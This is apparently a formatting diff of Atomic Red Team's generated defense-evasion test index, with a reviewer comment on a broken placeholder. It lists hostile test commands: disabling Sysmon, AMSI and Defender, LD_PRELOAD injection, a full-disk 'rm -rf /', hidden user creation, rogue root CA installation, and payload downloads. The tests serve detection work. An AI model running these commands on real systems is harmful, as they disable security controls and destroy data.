get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null 
@@ -25725,20 +25725,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed -' + ' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} -' + ' get_prereq_command: 'cmd /c sysmon -i -accepteula -' + ' executor: command: 'sysmon -u -' + ' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -25766,11 +25766,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse -' + ' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null -' + ' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -25844,11 +25844,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -' + ' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -' + ' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -25888,7 +25888,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -' + ' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -25898,7 +25898,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. -' + ' supported_platforms: - windows input_arguments: @@ -25919,7 +25919,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. -' + ' supported_platforms: - windows input_arguments: 
@@ -26006,23 +26006,23 @@ defense-evasion: description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization. -' + ' supported_platforms: - office-365 input_arguments: username: description: office-365 username type: String - default: + default: password: description: office-365 password type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'ExchangeOnlineManagement PowerShell module must be installed -' + ' prereq_command: | $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} @@ -26380,13 +26380,13 @@ defense-evasion: Provider to be federated must be configured (outside of the scope of this test). -' + ' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureADPreview -Force -' + ' executor: command: | Import-Module AzureADPreview @@ -26700,21 +26700,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD 
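Review bot: The prerequisite check in the `@@ -26700` hunk, `prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi;`, has an unbalanced placeholder — `#{path_to_shared_library ]` lacks the closing `}`, so the argument substitution presumably leaves it as literal text and the `[ -f … ]` test never evaluates the intended path (the sibling LD_PRELOAD test in the following hunk spells it `#{path_to_shared_library}` correctly). This line is unchanged context, so the defect predates this commit, and since this index is generated the correction belongs in the source atomic's YAML from which the index is regenerated; the corrected line would be `prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;`. Until it is fixed the dependency check likely fails or misbehaves on every run, so the test's `get_prereq_command` and executor may run on an unverified state.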
@@ -26739,18 +26739,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1055.001: technique: @@ -26850,10 +26850,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -27327,7 +27327,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory -' + ' supported_platforms: - linux - macos @@ -27339,14 +27339,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} -' + ' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it -' + ' supported_platforms: - linux - macos @@ -27358,14 +27358,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} -' + ' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it -' + ' supported_platforms: - linux input_arguments: 
@@ -27376,7 +27376,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} -' + ' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 @@ -27396,17 +27396,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} -' + ' executor: command: 'del /f #{file_to_delete} -' + ' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 @@ -27426,17 +27426,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'mkdir #{folder_to_delete} -' + ' executor: command: 'rmdir /s /q #{folder_to_delete} -' + ' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 @@ -27444,7 +27444,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -27458,17 +27458,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null -' + ' executor: command: 'Remove-Item -path #{file_to_delete} -' + ' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 
@@ -27476,7 +27476,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -27490,18 +27490,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null -' + ' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse -' + ' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 @@ -27509,13 +27509,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. -' + ' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null -' + ' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb @@ -27528,7 +27528,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) -' + ' name: powershell elevation_required: true - name: Delete TeamViewer Log Files @@ -27552,18 +27552,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) -' + ' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null -' + ' executor: command: 'Remove-Item #{teamviewer_log_file} -' + ' name: powershell T1222: technique: @@ -27708,7 +27708,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line -' + ' supported_platforms: - macos input_arguments: 
@@ -27719,7 +27719,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} -' + ' elevation_required: true name: sh T1484.001: @@ -27947,7 +27947,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory -' + ' supported_platforms: - linux - macos @@ -27957,20 +27957,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ -' + ' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS -' + ' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" -' + ' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 @@ -27988,20 +27988,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +s #{file_to_modify} -' + ' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib 
@@ -28020,27 +28020,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +h #{file_to_modify} -' + ' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools -' + ' supported_platforms: - macos input_arguments: @@ -28051,13 +28051,13 @@ defense-evasion: executor: command: 'setfile -a V #(unknown) -' + ' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS -' + ' supported_platforms: - macos executor: @@ -28066,22 +28066,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt -' + ' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS -' + ' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES -' + ' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO -' + ' name: sh T1564.002: technique: @@ -28129,7 +28129,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) -' + ' supported_platforms: - macos input_arguments: 
@@ -28140,17 +28140,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin -' + ' supported_platforms: - macos input_arguments: @@ -28161,10 +28161,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh T1564.003: @@ -28246,7 +28246,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} -' + ' name: powershell T1564: technique: @@ -28330,7 +28330,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -28340,7 +28340,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") @@ -28350,7 +28350,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore -' + ' name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 @@ -28525,7 +28525,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells -' + ' supported_platforms: - linux - macos 
@@ -28691,7 +28691,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files -' + ' supported_platforms: - linux input_arguments: @@ -28726,7 +28726,7 @@ defense-evasion: auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. -' + ' supported_platforms: - linux input_arguments: @@ -28871,10 +28871,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: -' + ' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: -' + ' name: command_prompt elevation_required: true T1202: @@ -28970,7 +28970,7 @@ defense-evasion: executor: command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process} -' + ' name: command_prompt - name: Indirect Command Execution - conhost.exe auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 @@ -28988,7 +28988,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" -' + ' name: command_prompt T1553.004: technique: @@ -29088,7 +29088,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -29115,7 +29115,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -29131,10 +29131,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} 
@@ -29148,7 +29148,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl -' + ' supported_platforms: - macos input_arguments: @@ -29164,10 +29164,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29175,14 +29175,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" -' + ' name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell -' + ' supported_platforms: - windows input_arguments: @@ -29194,10 +29194,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29219,7 +29219,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil -' + ' supported_platforms: - windows input_arguments: 
@@ -29231,10 +29231,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29242,7 +29242,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} -' + ' cleanup_command: | try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My @@ -29331,10 +29331,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29399,10 +29399,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29445,7 +29445,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: 
@@ -29470,10 +29470,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29516,7 +29516,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29541,10 +29541,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29587,7 +29587,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29612,10 +29612,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" 
@@ -29659,7 +29659,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29684,10 +29684,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29730,7 +29730,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. -' + ' supported_platforms: - windows input_arguments: @@ -29755,10 +29755,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29812,10 +29812,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" 
@@ -29997,7 +29997,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -30013,14 +30013,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -30036,14 +30036,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -30059,14 +30059,14 @@ defense-evasion: executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -30082,14 +30082,14 @@ defense-evasion: executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. -' + ' supported_platforms: - macos - linux 
@@ -30109,14 +30109,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. -' + ' supported_platforms: - macos - linux @@ -30136,13 +30136,13 @@ defense-evasion: executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. -' + ' supported_platforms: - macos - linux @@ -30158,13 +30158,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. -' + ' supported_platforms: - macos - linux @@ -30180,7 +30180,7 @@ defense-evasion: executor: command: 'chown -R #{owner} #{file_or_folder} -' + ' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f @@ -30198,7 +30198,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} -' + ' name: sh T1078.003: technique: @@ -30322,7 +30322,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. -' + ' supported_platforms: - windows input_arguments: 
@@ -30342,10 +30342,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) -' + ' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#(unknown)" @@ -30358,7 +30358,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. -' + ' supported_platforms: - windows input_arguments: @@ -30378,10 +30378,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) -' + ' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#(unknown)" @@ -30504,7 +30504,7 @@ defense-evasion: Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ -' + ' supported_platforms: - windows input_arguments: 
@@ -30516,20 +30516,20 @@ defense-evasion: dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) -' + ' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" -' + ' cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null -' + ' name: powershell - name: Mount an ISO image and run executable from the ISO auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc @@ -30551,10 +30551,10 @@ defense-evasion: dependencies: - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) -' + ' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" @@ -30588,18 +30588,18 @@ defense-evasion: - description: A test file with the Zone.Identifier attribute must be present. prereq_command: 'if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 } -' + ' get_prereq_command: | Invoke-WebRequest #{file_to_download} -OutFile #{file_path} Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3' executor: command: 'Unblock-File -Path #{file_path} -' + ' cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value ''[ZoneTransfer]'',''ZoneId=3'' -' + ' name: powershell T1036.004: technique: 
@@ -30675,7 +30675,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f -' + ' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc @@ -30690,7 +30690,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times -' + ' name: command_prompt elevation_required: true T1036: @@ -30840,7 +30840,7 @@ defense-evasion: description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) -' + ' supported_platforms: - macos - linux @@ -31089,11 +31089,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f -' + ' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify Registry of 